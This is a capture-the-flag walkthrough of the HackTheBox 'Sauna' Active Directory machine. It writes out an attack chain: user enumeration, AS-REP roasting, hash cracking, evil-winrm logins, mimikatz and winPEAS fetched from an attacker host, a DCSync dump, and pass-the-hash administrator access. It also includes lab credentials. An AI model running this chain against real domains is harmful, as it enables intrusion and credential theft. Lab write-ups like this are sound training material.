Sauna is an easy difficulty Windows machine that features Active Directory enumeration and exploitation. Possible usernames can be derived from employee full names listed on the website. With these usernames, an ASREPRoasting attack can be performed, which results in hash for an account that doesn’t require Kerberos pre-authentication. This hash can be subjected to an offline brute force attack, in order to recover the plaintext password for a user that is able to WinRM to the box. Running WinPEAS reveals that another system user has been configured to automatically login and it identifies their password. This second user also has Windows remote management permissions. BloodHound reveals that this user has the DS-Replication-Get-Changes-All extended right, which allows them to dump password hashes from the Domain Controller in a DCSync attack. Executing this attack returns the hash of the primary domain administrator, which can be used with Impacket’s psexec.py in order to gain a shell on the box as NT_AUTHORITY\SYSTEM.
Enumeration
Nmap
The provided nmap command has been used to perform a thorough port scan on the target host “sauna.htb.” Here’s an overview of the scan’s results:
1 | nmap 10.10.10.175 -sVC -Pn -p- -vvvv |
Output:
1 | PORT STATE SERVICE REASON VERSION |
Interesting things:
- Port 53: Open domain service.
- Port 80: Open HTTP port, hosting a server with the title “Egotistical Bank :: Home.”
- Port 88: Open Kerberos service.
- Port 135: Open Microsoft Windows RPC.
- Ports 139 and 445: SMB ports.
- Port 389: Open LDAP service, associated with Microsoft Windows Active Directory for the domain “EGOTISTICAL-BANK.LOCAL.”
The output indicates that the host is part of a domain named EGOTISTICAL-BANK.LOCAL We’ve added this domain name to /etc/hosts.
Enum4linux
1 | enum4linux 10.10.10.175 |
Output
1 | Target ........... EGOTISTICALBANK |
The output indicates that the host is part of a domain named “EGOTISTICALBANK.” We’ve added this domain name to /etc/hosts.
RPCbind
1 | rpcclient -U '' -N EGOTISTICALBANK |
Output:
1 | rpcclient $> enumdomusers |
The attempt to enumerate domain users with enumdomusers fails due to access denial.
ldapsearch
1 | nmap -n -sV --script "ldap* and not brute" 10.10.10.175 |
Output:
The user Hugo Smith is found but I can’t manage to get the hash with GetNPUsers.py.
I add him to my user list.
Website
While browsing the website I found the the team.![[Pasted image 20230823103018.png]]
With them we can create a list of users like bellow:
1 | Fergus Smith |
kerberos user enum (nmap)
We can also enumerate the users with nmap and krb5-enum-users script:
1 | nmap -p 88 --script=krb5-enum-users --script-args krb5-enum-users.realm='EGOTISTICAL-BANK.LOCAL',userdb=newusers.txt 10.10.10.175 |
Output:
1 | PORT STATE SERVICE |
The user hsmith should be Hugo Smith from the other scan above.
AS-REP Roasting
The AS-REP Roasting attack doesn’t work on this user, but should work on a user from the team:
1 | /usr/share/doc/python3-impacket/examples/GetNPUsers.py -dc-ip 10.10.10.175 EGOTISTICAL-BANK.LOCAL/hsmith -format john -outputfile hash |
hsmith is not a user from the team.
This user is showing us how they create the username from the first name and last name:
- Hugo Smith -> hsmith
So for the team it should be: - Fergus Smith -> fsmith
- Shaun Coins -> scoins
- Hugo Bear -> hbear
- Steven Kerb ->skerb
- Bowle Taylor -> btaylor
- Sophie Driver -> sdriver
kerberos userenum (kerbrute)
I’ve created a list with the users above:
1 | ➜ sauna cat team |
Now with kerbrute we can use userenum to see if they are valide:
1 | kerbrute userenum -d EGOTISTICAL-BANK.LOCAL team --dc 10.10.10.175 |
fsmith is the only valid username, we ca enumerate more with a another wordlist:
1 | kerbrute userenum -d EGOTISTICAL-BANK.LOCAL /usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-1000000.txt --dc 10.10.10.175 |
We found few others users:
1 | hsmith |
First User
Dump the TGT hash
I used the tool GetNPUsers.py from Impacket’s to harvest the non-preauth AS_REP responses against the user fsmith
1 | /usr/share/doc/python3-impacket/examples/GetNPUsers.py -dc-ip 10.10.10.175 EGOTISTICAL-BANK.LOCAL/fsmith -format john -outputfile hash |
Output:
1 | [*] Cannot authenticate fsmith, getting its TGT |
Now I crate a file named hash with the hash.
Crack the hash
With john I managed to crack the hash.
1 | john -wordlist=/usr/share/wordlists/SecLists/Passwords/Leaked-Databases/rockyou.txt hash |
Output:
1 | Thestrokes23 ([email protected]) |
Remote Windows Access with Evil-Winrm
Let’s get a shell with evil-winrm
1 | evil-winrm -i 10.10.10.175 -u fsmith -p Thestrokes23 |
Enumeration
Enumeration with BloodHound
First we need to collect the data, I’m using SharpHound.exe for this task.
I put this file into a simple web server on my machine to get from the target.
1 | cd /tools/ |
I can also do it with the upload function fron evil-winrm
1 | Invoke-WebRequest -Uri "http://10.10.14.23:8000/SharpHound.exe" -OutFile "SharpHound.exe" |
Drag and drop the zip file into bloodhound.
we can see a new user and also the next target: SVC_LOANMGR.
Enumeration with WinPEAS
Like I did for SharpHound.exe, I will download winPEAS.ps1.
1 | Invoke-WebRequest -Uri "http://10.10.14.23:8000/winPEAS.ps1" -OutFile "winPEAS.ps1" |
This tool found a credential into winlogon for.
Username: svc_loanmanager
Password: Moneymakestheworldgoround!svc_loanmanager should be SVC_LOANMGR from BloodHound
Second User
Evil-Winrm
Get the shell of the user svc_loanmanager
1 | evil-winrm -i 10.10.10.175 -u SVC_LOANMGR -p Moneymakestheworldgoround! |
Mimikatz DCSync
The webserver is already open, I just had to download mimikatz.exe and perform a DCSync Attack.
1 | Invoke-WebRequest -Uri "http://10.10.14.23:8000/mimikatz.exe" -OutFile "mimikatz.exe" |
Output:
The NTLM hash present in the result is: 823452073d75b9d1cf70ebdf86c7f98e.
NT AUTHORITY\SYSTEM
Evil-Winrm
With the NTLM hash from the user administrator, we can spawn a shell.
1 | evil-winrm -i EGOTISTICAL-BANK.LOCAL -u administrator -H 823452073d75b9d1cf70ebdf86c7f98e |
